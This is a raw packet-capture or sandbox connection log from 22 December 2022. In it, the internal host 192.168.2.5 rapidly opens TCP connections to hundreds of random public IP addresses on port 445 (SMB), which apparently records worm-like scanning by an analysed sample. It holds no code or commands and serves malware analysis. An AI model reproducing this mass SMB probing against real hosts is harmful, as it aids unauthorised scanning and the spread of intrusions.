                                                        Dec 22, 2022 10:05:32.028584957 CET51343445192.168.2.5118.182.43.252
                                                        Dec 22, 2022 10:05:32.199737072 CET51331445192.168.2.5156.218.133.35
                                                        Dec 22, 2022 10:05:32.282622099 CET44551331156.218.133.35192.168.2.5
                                                        Dec 22, 2022 10:05:32.487390995 CET51349445192.168.2.5151.249.38.11
                                                        Dec 22, 2022 10:05:32.487607956 CET51350445192.168.2.5109.4.143.120
                                                        Dec 22, 2022 10:05:32.731451988 CET51353445192.168.2.5122.88.174.239
                                                        Dec 22, 2022 10:05:32.731571913 CET51354445192.168.2.5129.217.92.181
                                                        Dec 22, 2022 10:05:32.731638908 CET51355445192.168.2.5203.167.22.222
                                                        Dec 22, 2022 10:05:32.731690884 CET51356445192.168.2.5208.93.248.36
                                                        Dec 22, 2022 10:05:32.731839895 CET51357445192.168.2.5186.124.135.18
                                                        Dec 22, 2022 10:05:32.731839895 CET51359445192.168.2.5176.11.35.85
                                                        Dec 22, 2022 10:05:32.731842041 CET51358445192.168.2.590.55.52.12
                                                        Dec 22, 2022 10:05:32.731998920 CET51361445192.168.2.5184.158.179.211
                                                        Dec 22, 2022 10:05:32.731998920 CET51360445192.168.2.586.142.168.169
                                                        Dec 22, 2022 10:05:32.732117891 CET51362445192.168.2.517.139.146.251
                                                        Dec 22, 2022 10:05:32.732260942 CET51363445192.168.2.546.148.88.21
                                                        Dec 22, 2022 10:05:32.732263088 CET51364445192.168.2.593.81.229.109
                                                        Dec 22, 2022 10:05:32.732284069 CET51365445192.168.2.520.253.75.15
                                                        Dec 22, 2022 10:05:32.732389927 CET51366445192.168.2.5144.183.73.2
                                                        Dec 22, 2022 10:05:32.732455969 CET51367445192.168.2.5164.108.55.21
                                                        Dec 22, 2022 10:05:32.735308886 CET51368445192.168.2.5202.101.9.212
                                                        Dec 22, 2022 10:05:32.735517025 CET51370445192.168.2.5204.136.192.82
                                                        Dec 22, 2022 10:05:32.735517025 CET51371445192.168.2.5190.141.225.124
                                                        Dec 22, 2022 10:05:32.735584974 CET51369445192.168.2.532.158.137.25
                                                        Dec 22, 2022 10:05:32.735672951 CET51372445192.168.2.573.103.218.209
                                                        Dec 22, 2022 10:05:32.735675097 CET51374445192.168.2.5153.125.108.174
                                                        Dec 22, 2022 10:05:32.735729933 CET51373445192.168.2.519.92.227.196
                                                        Dec 22, 2022 10:05:32.856733084 CET51375445192.168.2.553.211.39.144
                                                        Dec 22, 2022 10:05:32.856887102 CET51376445192.168.2.56.33.92.166
                                                        Dec 22, 2022 10:05:32.856899977 CET51377445192.168.2.5101.53.6.45
                                                        Dec 22, 2022 10:05:32.903621912 CET51378445192.168.2.541.203.13.27
                                                        Dec 22, 2022 10:05:33.028939962 CET51381445192.168.2.5103.8.133.223
                                                        Dec 22, 2022 10:05:33.029608011 CET51382445192.168.2.5177.134.47.119
                                                        Dec 22, 2022 10:05:33.145001888 CET51383445192.168.2.5116.54.189.151
                                                        Dec 22, 2022 10:05:33.387554884 CET51386445192.168.2.5145.230.155.98
                                                        Dec 22, 2022 10:05:33.591567039 CET51389445192.168.2.533.100.151.138
                                                        Dec 22, 2022 10:05:33.591775894 CET51390445192.168.2.5106.142.178.247
                                                        Dec 22, 2022 10:05:33.856581926 CET51392445192.168.2.5167.156.221.69
                                                        Dec 22, 2022 10:05:33.856816053 CET51394445192.168.2.5126.165.209.220
                                                        Dec 22, 2022 10:05:33.857012987 CET51395445192.168.2.526.122.145.52
                                                        Dec 22, 2022 10:05:33.857129097 CET51396445192.168.2.5166.70.25.165
                                                        Dec 22, 2022 10:05:33.857235909 CET51397445192.168.2.5182.51.23.6
                                                        Dec 22, 2022 10:05:33.857358932 CET51398445192.168.2.549.175.139.192
                                                        Dec 22, 2022 10:05:33.857465029 CET51399445192.168.2.569.213.130.21
                                                        Dec 22, 2022 10:05:33.857600927 CET51400445192.168.2.5141.133.12.13
                                                        Dec 22, 2022 10:05:33.857693911 CET51401445192.168.2.5179.57.213.199
                                                        Dec 22, 2022 10:05:33.857832909 CET51402445192.168.2.5207.251.251.75
                                                        Dec 22, 2022 10:05:33.858047962 CET51403445192.168.2.5195.28.73.215
                                                        Dec 22, 2022 10:05:33.858252048 CET51404445192.168.2.5139.10.163.119
                                                        Dec 22, 2022 10:05:33.858350992 CET51405445192.168.2.554.173.121.148
                                                        Dec 22, 2022 10:05:33.858443022 CET51406445192.168.2.5138.239.54.99
                                                        Dec 22, 2022 10:05:33.858570099 CET51407445192.168.2.5140.67.129.133
                                                        Dec 22, 2022 10:05:33.859401941 CET51408445192.168.2.582.124.8.65
                                                        Dec 22, 2022 10:05:33.861773968 CET51409445192.168.2.5144.176.129.176
                                                        Dec 22, 2022 10:05:33.861888885 CET51410445192.168.2.5103.131.149.56
                                                        Dec 22, 2022 10:05:33.861896992 CET51411445192.168.2.567.115.158.41
                                                        Dec 22, 2022 10:05:33.861960888 CET51412445192.168.2.550.224.217.164
                                                        Dec 22, 2022 10:05:33.862063885 CET51414445192.168.2.5112.57.60.230
                                                        Dec 22, 2022 10:05:33.862229109 CET51413445192.168.2.551.55.205.79
                                                        Dec 22, 2022 10:05:33.965872049 CET51416445192.168.2.5131.117.61.65
                                                        Dec 22, 2022 10:05:33.966048002 CET51417445192.168.2.5155.123.248.159
                                                        Dec 22, 2022 10:05:33.981606960 CET51418445192.168.2.541.203.13.28
                                                        Dec 22, 2022 10:05:34.153253078 CET51421445192.168.2.5195.166.245.24
                                                        Dec 22, 2022 10:05:34.153254986 CET51422445192.168.2.5116.66.222.244
                                                        Dec 22, 2022 10:05:34.246948957 CET51423445192.168.2.5107.30.134.61
                                                        Dec 22, 2022 10:05:34.453758001 CET4969980192.168.2.593.184.220.29
                                                        Dec 22, 2022 10:05:34.472919941 CET804969993.184.220.29192.168.2.5
                                                        Dec 22, 2022 10:05:34.473324060 CET4969980192.168.2.593.184.220.29
                                                        Dec 22, 2022 10:05:34.513655901 CET51426445192.168.2.534.95.169.210
                                                        Dec 22, 2022 10:05:34.715969086 CET51429445192.168.2.5111.52.35.2
                                                        Dec 22, 2022 10:05:34.716119051 CET51430445192.168.2.528.187.185.33
                                                        Dec 22, 2022 10:05:34.966284037 CET51433445192.168.2.5219.182.3.175
                                                        Dec 22, 2022 10:05:34.966383934 CET51434445192.168.2.5193.94.171.54
                                                        Dec 22, 2022 10:05:34.966528893 CET51435445192.168.2.513.150.157.94
                                                        Dec 22, 2022 10:05:34.966659069 CET51436445192.168.2.5192.142.74.248
                                                        Dec 22, 2022 10:05:34.966859102 CET51437445192.168.2.520.238.229.252
                                                        Dec 22, 2022 10:05:34.967075109 CET51438445192.168.2.536.222.17.11
                                                        Dec 22, 2022 10:05:34.967185020 CET51439445192.168.2.511.171.115.219
                                                        Dec 22, 2022 10:05:34.967371941 CET51440445192.168.2.510.128.169.21
                                                        Dec 22, 2022 10:05:34.967433929 CET51441445192.168.2.5104.104.113.179
                                                        Dec 22, 2022 10:05:34.967677116 CET51442445192.168.2.511.14.160.148
                                                        Dec 22, 2022 10:05:34.967869997 CET51443445192.168.2.5140.121.218.94
                                                        Dec 22, 2022 10:05:34.968030930 CET51444445192.168.2.5157.89.80.41
                                                        Dec 22, 2022 10:05:34.968197107 CET51445445192.168.2.5147.248.189.164
                                                        Dec 22, 2022 10:05:34.968317032 CET51446445192.168.2.5201.124.47.12
                                                        Dec 22, 2022 10:05:34.968816042 CET51447445192.168.2.560.26.77.3
                                                        Dec 22, 2022 10:05:34.973031044 CET51448445192.168.2.5166.228.72.99
                                                        Dec 22, 2022 10:05:34.974670887 CET51450445192.168.2.525.125.204.250
                                                        Dec 22, 2022 10:05:34.974802017 CET51451445192.168.2.57.179.54.45
                                                        Dec 22, 2022 10:05:34.974802017 CET51449445192.168.2.557.92.4.212
                                                        Dec 22, 2022 10:05:34.974879026 CET51452445192.168.2.58.156.20.46
                                                        Dec 22, 2022 10:05:34.974888086 CET51453445192.168.2.515.53.182.205
                                                        Dec 22, 2022 10:05:34.975024939 CET51454445192.168.2.5188.74.87.109
                                                        Dec 22, 2022 10:05:35.044219971 CET51456445192.168.2.541.203.13.29
                                                        Dec 22, 2022 10:05:35.075275898 CET51457445192.168.2.565.186.61.226
                                                        Dec 22, 2022 10:05:35.075541019 CET51458445192.168.2.548.131.172.103
                                                        Dec 22, 2022 10:05:35.075684071 CET51459445192.168.2.5129.155.133.64
                                                        Dec 22, 2022 10:05:35.262867928 CET51463445192.168.2.515.15.16.249
                                                        Dec 22, 2022 10:05:35.262878895 CET51462445192.168.2.583.172.43.9
                                                        Dec 22, 2022 10:05:35.372245073 CET51464445192.168.2.5217.87.24.12
                                                        Dec 22, 2022 10:05:35.622241020 CET51468445192.168.2.5162.188.39.93
                                                        Dec 22, 2022 10:05:35.840915918 CET51470445192.168.2.59.65.112.217
                                                        Dec 22, 2022 10:05:35.840925932 CET51471445192.168.2.5105.180.198.251
                                                        Dec 22, 2022 10:05:36.092071056 CET51474445192.168.2.58.252.134.104
                                                        Dec 22, 2022 10:05:36.092071056 CET51475445192.168.2.5103.203.96.250
                                                        Dec 22, 2022 10:05:36.092447996 CET51476445192.168.2.540.54.158.208
                                                        Dec 22, 2022 10:05:36.092662096 CET51477445192.168.2.5133.135.102.135
                                                        Dec 22, 2022 10:05:36.092925072 CET51478445192.168.2.594.134.9.200
                                                        Dec 22, 2022 10:05:36.093235970 CET51479445192.168.2.531.88.103.52
                                                        Dec 22, 2022 10:05:36.093820095 CET51480445192.168.2.5109.166.162.104
                                                        Dec 22, 2022 10:05:36.093969107 CET51481445192.168.2.5162.31.116.166
                                                        Dec 22, 2022 10:05:36.094393969 CET51482445192.168.2.523.109.129.42
                                                        Dec 22, 2022 10:05:36.094623089 CET51483445192.168.2.575.73.213.217
                                                        Dec 22, 2022 10:05:36.094960928 CET51484445192.168.2.512.45.209.116
                                                        Dec 22, 2022 10:05:36.095216990 CET51485445192.168.2.514.227.61.218
                                                        Dec 22, 2022 10:05:36.095572948 CET51486445192.168.2.5199.19.3.226
                                                        Dec 22, 2022 10:05:36.095777988 CET51487445192.168.2.543.114.171.200
                                                        Dec 22, 2022 10:05:36.096211910 CET51488445192.168.2.5174.94.97.85
                                                        Dec 22, 2022 10:05:36.097225904 CET51489445192.168.2.541.191.41.147
                                                        Dec 22, 2022 10:05:36.098650932 CET51490445192.168.2.560.103.31.167
                                                        Dec 22, 2022 10:05:36.107502937 CET51496445192.168.2.541.203.13.30
                                                        Dec 22, 2022 10:05:36.107789993 CET51491445192.168.2.579.56.217.249
                                                        Dec 22, 2022 10:05:36.108045101 CET51492445192.168.2.5158.134.40.240
                                                        Dec 22, 2022 10:05:36.108129978 CET51493445192.168.2.519.21.128.83
                                                        Dec 22, 2022 10:05:36.108344078 CET51494445192.168.2.5116.223.161.35
                                                        Dec 22, 2022 10:05:36.108462095 CET51495445192.168.2.5130.26.8.114
                                                        Dec 22, 2022 10:05:36.184926033 CET51498445192.168.2.560.91.153.67
                                                        Dec 22, 2022 10:05:36.185174942 CET51499445192.168.2.597.188.113.1
                                                        Dec 22, 2022 10:05:36.185405016 CET51500445192.168.2.5110.83.97.226
                                                        Dec 22, 2022 10:05:36.388067007 CET51503445192.168.2.522.11.138.115
                                                        Dec 22, 2022 10:05:36.388302088 CET51504445192.168.2.57.177.113.36
                                                        Dec 22, 2022 10:05:36.472989082 CET4455149860.91.153.67192.168.2.5
                                                        Dec 22, 2022 10:05:36.497179031 CET51506445192.168.2.5167.85.70.221
                                                        Dec 22, 2022 10:05:36.732187033 CET51509445192.168.2.577.104.1.132
                                                        Dec 22, 2022 10:05:36.966224909 CET51511445192.168.2.5203.44.38.24
                                                        Dec 22, 2022 10:05:36.966444016 CET51512445192.168.2.529.145.122.104
                                                        Dec 22, 2022 10:05:36.981333017 CET51498445192.168.2.560.91.153.67
                                                        Dec 22, 2022 10:05:37.185056925 CET51515445192.168.2.541.203.13.31
                                                        Dec 22, 2022 10:05:37.216171026 CET51516445192.168.2.579.66.215.234
                                                        Dec 22, 2022 10:05:37.216171026 CET51517445192.168.2.556.87.219.236
                                                        Dec 22, 2022 10:05:37.216332912 CET51518445192.168.2.5216.78.212.167
                                                        Dec 22, 2022 10:05:37.216473103 CET51519445192.168.2.558.86.249.141
                                                        Dec 22, 2022 10:05:37.216528893 CET51520445192.168.2.5135.45.107.78
                                                        Dec 22, 2022 10:05:37.216639042 CET51521445192.168.2.527.232.97.82
                                                        Dec 22, 2022 10:05:37.216818094 CET51522445192.168.2.564.41.190.136
                                                        Dec 22, 2022 10:05:37.216820955 CET51523445192.168.2.578.50.104.173
                                                        Dec 22, 2022 10:05:37.216820955 CET51524445192.168.2.5150.215.51.183
                                                        Dec 22, 2022 10:05:37.216905117 CET51525445192.168.2.5100.5.231.4
                                                        Dec 22, 2022 10:05:37.216964960 CET51526445192.168.2.565.32.87.114
                                                        Dec 22, 2022 10:05:37.217106104 CET51528445192.168.2.5181.195.166.44
                                                        Dec 22, 2022 10:05:37.217119932 CET51527445192.168.2.5203.176.173.63
                                                        Dec 22, 2022 10:05:37.217252970 CET51529445192.168.2.59.11.92.166
                                                        Dec 22, 2022 10:05:37.217307091 CET51530445192.168.2.574.87.155.232
                                                        Dec 22, 2022 10:05:37.218354940 CET51532445192.168.2.5215.227.20.216
                                                        Dec 22, 2022 10:05:37.218580008 CET51533445192.168.2.538.23.102.193
                                                        Dec 22, 2022 10:05:37.233910084 CET51534445192.168.2.5160.57.97.91
                                                        Dec 22, 2022 10:05:37.234071970 CET51535445192.168.2.5132.3.119.29
                                                        Dec 22, 2022 10:05:37.234173059 CET51536445192.168.2.571.42.213.231
                                                        Dec 22, 2022 10:05:37.234241962 CET51537445192.168.2.5131.47.116.227
                                                        Dec 22, 2022 10:05:37.234292030 CET51538445192.168.2.587.230.70.81
                                                        Dec 22, 2022 10:05:37.269474983 CET4455149860.91.153.67192.168.2.5
                                                        Dec 22, 2022 10:05:37.309906960 CET51541445192.168.2.538.247.243.139
                                                        Dec 22, 2022 10:05:37.310008049 CET51540445192.168.2.5126.55.218.197
                                                        Dec 22, 2022 10:05:37.310113907 CET51542445192.168.2.577.199.115.157
                                                        Dec 22, 2022 10:05:37.377660990 CET4455153338.23.102.193192.168.2.5
                                                        Dec 22, 2022 10:05:37.497422934 CET51545445192.168.2.5177.226.250.5
                                                        Dec 22, 2022 10:05:37.497667074 CET51546445192.168.2.5132.122.250.218
                                                        Dec 22, 2022 10:05:37.602829933 CET44551540126.55.218.197192.168.2.5
                                                        Dec 22, 2022 10:05:37.607158899 CET51548445192.168.2.5222.187.201.15
                                                        Dec 22, 2022 10:05:37.868014097 CET51551445192.168.2.5154.17.107.174
                                                        Dec 22, 2022 10:05:37.887742996 CET51533445192.168.2.538.23.102.193
                                                        Dec 22, 2022 10:05:38.047282934 CET4455153338.23.102.193192.168.2.5
                                                        Dec 22, 2022 10:05:38.075460911 CET51554445192.168.2.5104.252.206.102
                                                        Dec 22, 2022 10:05:38.075488091 CET51553445192.168.2.51.224.196.40
                                                        Dec 22, 2022 10:05:38.106501102 CET51540445192.168.2.5126.55.218.197
                                                        Dec 22, 2022 10:05:38.247503996 CET51557445192.168.2.541.203.13.32
                                                        Dec 22, 2022 10:05:38.341587067 CET51558445192.168.2.53.37.159.67
                                                        Dec 22, 2022 10:05:38.341598034 CET51559445192.168.2.511.214.237.82
                                                        Dec 22, 2022 10:05:38.341856003 CET51560445192.168.2.5223.41.129.209
                                                        Dec 22, 2022 10:05:38.341969013 CET51561445192.168.2.5200.230.29.131
                                                        Dec 22, 2022 10:05:38.342103958 CET51562445192.168.2.5179.85.18.30
                                                        Dec 22, 2022 10:05:38.342206001 CET51563445192.168.2.5115.241.41.189
                                                        Dec 22, 2022 10:05:38.342324972 CET51564445192.168.2.5180.222.228.51
                                                        Dec 22, 2022 10:05:38.345889091 CET51567445192.168.2.514.57.223.164
                                                        Dec 22, 2022 10:05:38.345892906 CET51569445192.168.2.538.97.106.173
                                                        Dec 22, 2022 10:05:38.345889091 CET51565445192.168.2.574.231.47.87
                                                        Dec 22, 2022 10:05:38.345895052 CET51571445192.168.2.533.140.16.249
                                                        Dec 22, 2022 10:05:38.345896006 CET51568445192.168.2.5157.39.166.17
                                                        Dec 22, 2022 10:05:38.345889091 CET51566445192.168.2.516.171.69.39
                                                        Dec 22, 2022 10:05:38.345896959 CET51570445192.168.2.527.245.107.84
                                                        Dec 22, 2022 10:05:38.345896959 CET51572445192.168.2.566.3.46.68
                                                        Dec 22, 2022 10:05:38.346865892 CET51574445192.168.2.548.211.168.10
                                                        Dec 22, 2022 10:05:38.346986055 CET51575445192.168.2.566.208.1.26
                                                        Dec 22, 2022 10:05:38.346991062 CET51576445192.168.2.578.134.242.238
                                                        Dec 22, 2022 10:05:38.347073078 CET51577445192.168.2.519.76.131.20
                                                        Dec 22, 2022 10:05:38.347119093 CET51578445192.168.2.5189.15.27.196
                                                        Dec 22, 2022 10:05:38.347156048 CET51579445192.168.2.556.46.175.230
                                                        Dec 22, 2022 10:05:38.347218990 CET51580445192.168.2.576.153.108.226
                                                        Dec 22, 2022 10:05:38.399620056 CET44551540126.55.218.197192.168.2.5
                                                        Dec 22, 2022 10:05:38.435065985 CET51583445192.168.2.590.235.76.212
                                                        Dec 22, 2022 10:05:38.435066938 CET51582445192.168.2.585.46.241.195
                                                        Dec 22, 2022 10:05:38.435237885 CET51584445192.168.2.531.107.111.224
                                                        Dec 22, 2022 10:05:38.631962061 CET51587445192.168.2.5101.226.3.72
                                                        Dec 22, 2022 10:05:38.632150888 CET51588445192.168.2.534.161.192.213
                                                        Dec 22, 2022 10:05:38.716308117 CET51589445192.168.2.5130.241.167.99
                                                        Dec 22, 2022 10:05:38.981936932 CET51592445192.168.2.5145.120.159.40
                                                        Dec 22, 2022 10:05:39.200767040 CET51596445192.168.2.5108.76.108.23
                                                        Dec 22, 2022 10:05:39.200926065 CET51597445192.168.2.5216.118.36.247
                                                        Dec 22, 2022 10:05:39.309968948 CET51600445192.168.2.541.203.13.33
                                                        Dec 22, 2022 10:05:39.451167107 CET51601445192.168.2.516.176.179.222
                                                        Dec 22, 2022 10:05:39.451417923 CET51602445192.168.2.567.143.117.240
                                                        Dec 22, 2022 10:05:39.451687098 CET51603445192.168.2.5133.86.74.120
                                                        Dec 22, 2022 10:05:39.451865911 CET51604445192.168.2.551.42.78.122
                                                        Dec 22, 2022 10:05:39.452104092 CET51605445192.168.2.510.149.237.179
                                                        Dec 22, 2022 10:05:39.452341080 CET51606445192.168.2.5201.121.249.13
                                                        Dec 22, 2022 10:05:39.452503920 CET51607445192.168.2.5214.201.238.191
                                                        Dec 22, 2022 10:05:39.452826977 CET51608445192.168.2.5179.38.108.141
                                                        Dec 22, 2022 10:05:39.452995062 CET51609445192.168.2.5166.161.16.213
                                                        Dec 22, 2022 10:05:39.453167915 CET51610445192.168.2.5216.170.162.9
                                                        Dec 22, 2022 10:05:39.453313112 CET51611445192.168.2.5202.42.187.52
                                                        Dec 22, 2022 10:05:39.453720093 CET51612445192.168.2.5177.209.223.219
                                                        Dec 22, 2022 10:05:39.453963041 CET51613445192.168.2.5187.155.10.172
                                                        Dec 22, 2022 10:05:39.454286098 CET51614445192.168.2.5112.69.247.26
                                                        Dec 22, 2022 10:05:39.454595089 CET51615445192.168.2.5211.100.252.224
                                                        Dec 22, 2022 10:05:39.456393003 CET51617445192.168.2.5139.17.35.88
                                                        Dec 22, 2022 10:05:39.459248066 CET51618445192.168.2.5113.103.245.1
                                                        Dec 22, 2022 10:05:39.462018967 CET51619445192.168.2.522.207.185.17
                                                        Dec 22, 2022 10:05:39.464782953 CET51620445192.168.2.516.84.35.37
                                                        Dec 22, 2022 10:05:39.465337038 CET51621445192.168.2.534.78.70.213
                                                        Dec 22, 2022 10:05:39.465379953 CET51622445192.168.2.5194.6.28.46
                                                        Dec 22, 2022 10:05:39.465471029 CET51623445192.168.2.5189.200.47.150
                                                        Dec 22, 2022 10:05:39.474811077 CET44551562179.85.18.30192.168.2.5
                                                        Dec 22, 2022 10:05:39.474854946 CET44551562179.85.18.30192.168.2.5
                                                        Dec 22, 2022 10:05:39.474885941 CET51562445192.168.2.5179.85.18.30
                                                        Dec 22, 2022 10:05:39.545541048 CET51625445192.168.2.5118.131.55.193
                                                        Dec 22, 2022 10:05:39.545836926 CET51626445192.168.2.540.129.235.232
                                                        Dec 22, 2022 10:05:39.546382904 CET51627445192.168.2.5104.163.173.71
                                                        Dec 22, 2022 10:05:39.732152939 CET51631445192.168.2.5103.136.56.169
                                                        Dec 22, 2022 10:05:39.732244015 CET51630445192.168.2.5144.35.59.249
                                                        Dec 22, 2022 10:05:39.826704979 CET51632445192.168.2.5191.78.54.49
                                                        Dec 22, 2022 10:05:40.091653109 CET51636445192.168.2.5163.90.47.209
                                                        Dec 22, 2022 10:05:40.325706959 CET51640445192.168.2.5202.174.108.164
                                                        Dec 22, 2022 10:05:40.325751066 CET51639445192.168.2.547.54.164.137
                                                        Dec 22, 2022 10:05:40.388107061 CET51643445192.168.2.541.203.13.34
                                                        Dec 22, 2022 10:05:40.576714993 CET51644445192.168.2.5109.224.172.82
                                                        Dec 22, 2022 10:05:40.577470064 CET51645445192.168.2.5158.37.18.147
                                                        Dec 22, 2022 10:05:40.578262091 CET51646445192.168.2.5171.66.121.60
                                                        Dec 22, 2022 10:05:40.579030037 CET51647445192.168.2.5142.76.87.31
                                                        Dec 22, 2022 10:05:40.579781055 CET51648445192.168.2.569.36.67.245
                                                        Dec 22, 2022 10:05:40.580415964 CET51649445192.168.2.5170.253.42.228
                                                        Dec 22, 2022 10:05:40.581222057 CET51650445192.168.2.5215.48.218.60
                                                        Dec 22, 2022 10:05:40.581765890 CET51652445192.168.2.560.249.39.71
                                                        Dec 22, 2022 10:05:40.582021952 CET51653445192.168.2.51.5.69.46
                                                        Dec 22, 2022 10:05:40.582202911 CET51654445192.168.2.5133.95.0.251
                                                        Dec 22, 2022 10:05:40.582310915 CET51655445192.168.2.566.167.153.119
                                                        Dec 22, 2022 10:05:40.582422972 CET51656445192.168.2.534.151.148.133
                                                        Dec 22, 2022 10:05:40.582638979 CET51657445192.168.2.5191.232.207.36
                                                        Dec 22, 2022 10:05:40.582750082 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:40.582923889 CET51659445192.168.2.5124.24.103.151
                                                        Dec 22, 2022 10:05:40.583043098 CET51660445192.168.2.5208.52.11.146
                                                        Dec 22, 2022 10:05:40.583177090 CET51661445192.168.2.5195.63.31.186
                                                        Dec 22, 2022 10:05:40.583271980 CET51662445192.168.2.5177.129.226.190
                                                        Dec 22, 2022 10:05:40.583391905 CET51663445192.168.2.5194.73.157.15
                                                        Dec 22, 2022 10:05:40.583592892 CET51664445192.168.2.5185.254.0.183
                                                        Dec 22, 2022 10:05:40.583767891 CET51665445192.168.2.518.49.85.208
                                                        Dec 22, 2022 10:05:40.583899975 CET51666445192.168.2.5168.206.89.219
                                                        Dec 22, 2022 10:05:40.617527962 CET4455165884.7.167.138192.168.2.5
                                                        Dec 22, 2022 10:05:40.617675066 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:40.617834091 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:40.618030071 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:40.652426004 CET4455166784.7.167.1192.168.2.5
                                                        Dec 22, 2022 10:05:40.652637005 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:40.653121948 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:40.653477907 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:40.669780016 CET51670445192.168.2.5134.19.240.253
                                                        Dec 22, 2022 10:05:40.670101881 CET51671445192.168.2.5209.71.94.100
                                                        Dec 22, 2022 10:05:40.670277119 CET51672445192.168.2.5124.214.248.20
                                                        Dec 22, 2022 10:05:40.688477993 CET4455166984.7.167.1192.168.2.5
                                                        Dec 22, 2022 10:05:40.688692093 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:40.688692093 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:40.843578100 CET4455165260.249.39.71192.168.2.5
                                                        Dec 22, 2022 10:05:40.857333899 CET51675445192.168.2.5128.67.128.124
                                                        Dec 22, 2022 10:05:40.857530117 CET51676445192.168.2.5183.206.129.201
                                                        Dec 22, 2022 10:05:40.919248104 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:40.935282946 CET51677445192.168.2.5203.213.170.226
                                                        Dec 22, 2022 10:05:40.950506926 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:40.966068983 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:41.201231003 CET51681445192.168.2.5177.188.28.243
                                                        Dec 22, 2022 10:05:41.263008118 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:41.356774092 CET51652445192.168.2.560.249.39.71
                                                        Dec 22, 2022 10:05:41.435476065 CET51685445192.168.2.53.107.116.44
                                                        Dec 22, 2022 10:05:41.435952902 CET51686445192.168.2.5201.47.26.25
                                                        Dec 22, 2022 10:05:41.451267958 CET51687445192.168.2.541.203.13.35
                                                        Dec 22, 2022 10:05:41.528654099 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:41.575783968 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:41.618206978 CET4455165260.249.39.71192.168.2.5
                                                        Dec 22, 2022 10:05:41.701076031 CET51692445192.168.2.5134.232.222.77
                                                        Dec 22, 2022 10:05:41.701235056 CET51694445192.168.2.5131.192.79.244
                                                        Dec 22, 2022 10:05:41.701234102 CET51690445192.168.2.559.119.1.139
                                                        Dec 22, 2022 10:05:41.701234102 CET51693445192.168.2.58.89.74.117
                                                        Dec 22, 2022 10:05:41.701375008 CET51695445192.168.2.5156.62.169.135
                                                        Dec 22, 2022 10:05:41.701391935 CET51696445192.168.2.577.25.102.14
                                                        Dec 22, 2022 10:05:41.701514006 CET51697445192.168.2.558.44.0.242
                                                        Dec 22, 2022 10:05:41.701544046 CET51698445192.168.2.5223.164.194.16
                                                        Dec 22, 2022 10:05:41.701632023 CET51699445192.168.2.59.112.185.64
                                                        Dec 22, 2022 10:05:41.701699018 CET51700445192.168.2.550.89.142.202
                                                        Dec 22, 2022 10:05:41.701831102 CET51701445192.168.2.575.10.71.8
                                                        Dec 22, 2022 10:05:41.701930046 CET51702445192.168.2.5106.40.64.35
                                                        Dec 22, 2022 10:05:41.701946974 CET51703445192.168.2.588.22.162.216
                                                        Dec 22, 2022 10:05:41.702095032 CET51704445192.168.2.565.174.50.132
                                                        Dec 22, 2022 10:05:41.706712008 CET51705445192.168.2.5104.6.103.155
                                                        Dec 22, 2022 10:05:41.706818104 CET51706445192.168.2.586.171.65.248
                                                        Dec 22, 2022 10:05:41.707154036 CET51707445192.168.2.594.67.248.143
                                                        Dec 22, 2022 10:05:41.709927082 CET51708445192.168.2.576.242.34.112
                                                        Dec 22, 2022 10:05:41.710042953 CET51709445192.168.2.58.132.16.0
                                                        Dec 22, 2022 10:05:41.710042953 CET51711445192.168.2.5108.101.177.17
                                                        Dec 22, 2022 10:05:41.710093975 CET51710445192.168.2.528.42.182.224
                                                        Dec 22, 2022 10:05:41.794630051 CET51714445192.168.2.5147.217.8.96
                                                        Dec 22, 2022 10:05:41.794684887 CET51713445192.168.2.577.115.162.11
                                                        Dec 22, 2022 10:05:41.794858932 CET51715445192.168.2.5133.110.117.59
                                                        Dec 22, 2022 10:05:41.872432947 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:41.982079029 CET51718445192.168.2.578.202.72.159
                                                        Dec 22, 2022 10:05:41.982228041 CET51719445192.168.2.5220.181.207.18
                                                        Dec 22, 2022 10:05:42.062109947 CET51721445192.168.2.5136.0.29.31
                                                        Dec 22, 2022 10:05:42.329835892 CET51724445192.168.2.5223.108.166.7
                                                        Dec 22, 2022 10:05:42.529506922 CET51728445192.168.2.541.203.13.36
                                                        Dec 22, 2022 10:05:42.544899940 CET51730445192.168.2.5191.212.187.64
                                                        Dec 22, 2022 10:05:42.544905901 CET51729445192.168.2.5116.29.96.217
                                                        Dec 22, 2022 10:05:42.731926918 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:42.778862953 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:42.811177015 CET51734445192.168.2.5141.236.39.141
                                                        Dec 22, 2022 10:05:42.811583996 CET51736445192.168.2.5113.214.23.97
                                                        Dec 22, 2022 10:05:42.811764002 CET51737445192.168.2.582.107.246.7
                                                        Dec 22, 2022 10:05:42.811927080 CET51738445192.168.2.588.15.41.8
                                                        Dec 22, 2022 10:05:42.812012911 CET51739445192.168.2.5182.253.131.99
                                                        Dec 22, 2022 10:05:42.812153101 CET51740445192.168.2.5164.197.0.11
                                                        Dec 22, 2022 10:05:42.812369108 CET51741445192.168.2.576.210.18.191
                                                        Dec 22, 2022 10:05:42.812526941 CET51742445192.168.2.579.79.83.113
                                                        Dec 22, 2022 10:05:42.812654972 CET51743445192.168.2.546.209.16.157
                                                        Dec 22, 2022 10:05:42.812771082 CET51744445192.168.2.5125.36.183.12
                                                        Dec 22, 2022 10:05:42.812886953 CET51745445192.168.2.58.251.45.38
                                                        Dec 22, 2022 10:05:42.813005924 CET51746445192.168.2.522.102.111.207
                                                        Dec 22, 2022 10:05:42.813199043 CET51747445192.168.2.5131.109.165.124
                                                        Dec 22, 2022 10:05:42.813919067 CET51748445192.168.2.5214.171.100.144
